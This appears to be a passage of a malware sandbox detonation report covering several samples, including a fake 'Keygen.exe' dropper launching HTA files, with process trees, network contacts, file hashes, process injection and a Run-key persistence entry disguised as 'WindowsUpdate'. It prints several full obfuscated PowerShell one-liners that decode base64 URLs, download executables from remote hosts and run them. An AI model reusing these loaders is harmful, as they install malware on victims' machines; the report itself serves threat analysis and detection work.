$edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

Network

Country Destination Domain Proto
US 8.8.8.8:53 zxvbcrt.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 pdshcjvnv.ug udp
US 8.8.8.8:53 rbcxvnb.ug udp
US 23.21.31.78:80 bit.do tcp
GB 88.221.135.25:443 www.bing.com tcp
DE 142.250.185.131:80 c.pki.goog tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\685F.tmp\m.hta

MD5 9383fc3f57fa2cea100b103c7fd9ea7c
SHA1 84ea6c1913752cb744e061ff2a682d9fe4039a37
SHA256 831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d
SHA512 16eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600

C:\Users\Admin\AppData\Local\Temp\685F.tmp\start.bat

MD5 68d86e419dd970356532f1fbcb15cb11
SHA1 e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a
SHA256 d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe
SHA512 3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe

MD5 ea2c982c12fbec5f145948b658da1691
SHA1 d17baf0b8f782934da0c686f2e87f019643be458
SHA256 eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4
SHA512 1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

memory/4560-22-0x0000000000600000-0x0000000000603000-memory.dmp

memory/4560-21-0x0000000000400000-0x00000000005BC000-memory.dmp

memory/4560-23-0x0000000000830000-0x0000000000831000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\m1.hta

MD5 5eb75e90380d454828522ed546ea3cb7
SHA1 45c89f292d035367aeb2ddeb3110387a772c8a49
SHA256 dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e
SHA512 0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

memory/4812-28-0x0000000004D30000-0x0000000004D66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\b.hta

MD5 5bbba448146acc4530b38017be801e2e
SHA1 8c553a7d3492800b630fc7d65a041ae2d466fb36
SHA256 96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170
SHA512 48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

memory/4812-32-0x00000000053A0000-0x00000000059C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\b1.hta

MD5 c57770e25dd4e35b027ed001d9f804c2
SHA1 408b1b1e124e23c2cc0c78b58cb0e595e10c83c0
SHA256 bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5
SHA512 ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

memory/5648-34-0x0000000004C60000-0x0000000004C82000-memory.dmp

memory/4812-36-0x0000000005C70000-0x0000000005CD6000-memory.dmp

memory/4812-35-0x0000000005C00000-0x0000000005C66000-memory.dmp

memory/4812-37-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa5d303w.cq0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5648-74-0x0000000005C10000-0x0000000005C2E000-memory.dmp

memory/5648-75-0x0000000006160000-0x00000000061AC000-memory.dmp

memory/5648-76-0x0000000007360000-0x00000000079DA000-memory.dmp

memory/4812-77-0x00000000071F0000-0x000000000720A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba.hta

MD5 b762ca68ba25be53780beb13939870b2
SHA1 1780ee68efd4e26ce1639c6839c7d969f0137bfd
SHA256 c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1
SHA512 f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba1.hta

MD5 a2ea849e5e5048a5eacd872a5d17aba5
SHA1 65acf25bb62840fd126bf8adca3bb8814226e30f
SHA256 0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c
SHA512 d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

memory/4812-100-0x00000000077D0000-0x0000000007866000-memory.dmp

memory/4812-101-0x0000000007770000-0x0000000007792000-memory.dmp

memory/4812-102-0x0000000008660000-0x0000000008C04000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9b649256d9ddd85774423ff3c99ee8b
SHA1 fe7df1aa304c60331f79954b441c92f1a76dc538
SHA256 4c0f7a3b7b9bb5be1ee07eb81ee40ccc23c55adc6c2d68ccef9f3d49c89755d5
SHA512 487c6553b27ac549fca7867b872c45be6ef668b6d22315fc9a5f6fe3f647709e1d366df795758a94316e16b848cdd2b781f88ef456b9a025707b66cf925b72ec

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/4560-108-0x0000000000400000-0x00000000005BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 68882a2a174a39d33a35f8ba4e900b92
SHA1 ddda1e91496f7ff93a0996a7e375b06e45c6d839
SHA256 79e6e76061ce02ae717d6af118ccf2ee427b68ad3e6709f6770f4cd65c952a90
SHA512 f7816dd9d766d2d375181d61c4bc5db2d394b40cb85472651fc11dfb2d91f8794387e86d2f38c29c76cbac8ea16203db3cb7865de87f4f7f4b4adf9febc43d59

memory/4560-112-0x0000000000830000-0x0000000000831000-memory.dmp

memory/4560-111-0x0000000000400000-0x00000000005BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92227069c218a710a4fd42e43670bf2a
SHA1 c34bd56483981d10d8624ea543e961d6f056867c
SHA256 7e348bb332ae824a0661c542343fa68bc816ff413b47ef48f65cac32973a01b8
SHA512 1d3e156a1801c419ada3684903d6f320d16b138f2e1a928d661619377f29f8edd3cce916bed3edf2998982cbaf013d8082ddbebe3c84a18d500860428138d711

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a806a9395d6c8ddee5d2a34df2270c
SHA1 9137d7ff3aad9c691f1523bc19f656e6a540785a
SHA256 5d84985fc622acf7c807c2e740d1f3fef7763f0d7d663ca9c942c3c804c8d9b2
SHA512 d52d3a6ce9f43a1b1c9aeb49608065935fbd44d141bcc9911f4dc8e3b147c8e877369e0486a80db176dead5e5ade93d44d286da2cd674ae6dcdaee00c8e42e9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e46c1c40effe64c4e4d008bc050a68e
SHA1 66587b5f11c501c29fb9a1a1a8b5bd8ff2a6005f
SHA256 7973ccaa92a20ed015d790f4a2a740053ccb5c0a73581afae73c3aa0f2e333fb
SHA512 b5fcdc8c80776ec089e4664eaf177670079b0af8b056277f06accfc47ff6e4c371b6ba61c8af092a999dd81feb8009147561eeb7bc369b1acc14dec368c925ac

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1660 -ip 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 1624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
RU 217.8.117.77:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/1660-0-0x00000000748DE000-0x00000000748DF000-memory.dmp

memory/1660-1-0x00000000009A0000-0x0000000000A00000-memory.dmp

memory/1660-2-0x0000000005920000-0x0000000005EC4000-memory.dmp

memory/1660-3-0x0000000005290000-0x0000000005322000-memory.dmp

memory/1660-4-0x00000000748D0000-0x0000000075080000-memory.dmp

memory/1660-5-0x0000000005350000-0x000000000535A000-memory.dmp

memory/1660-6-0x00000000080D0000-0x00000000085FC000-memory.dmp

memory/1660-7-0x0000000007D60000-0x0000000007D7C000-memory.dmp

memory/1660-8-0x00000000748DE000-0x00000000748DF000-memory.dmp

memory/1660-9-0x00000000748D0000-0x0000000075080000-memory.dmp

memory/1660-10-0x0000000007E80000-0x0000000007ECC000-memory.dmp

memory/1660-11-0x0000000007F70000-0x000000000800C000-memory.dmp

memory/1660-12-0x00000000748D0000-0x0000000075080000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1760 set thread context of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 set thread context of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

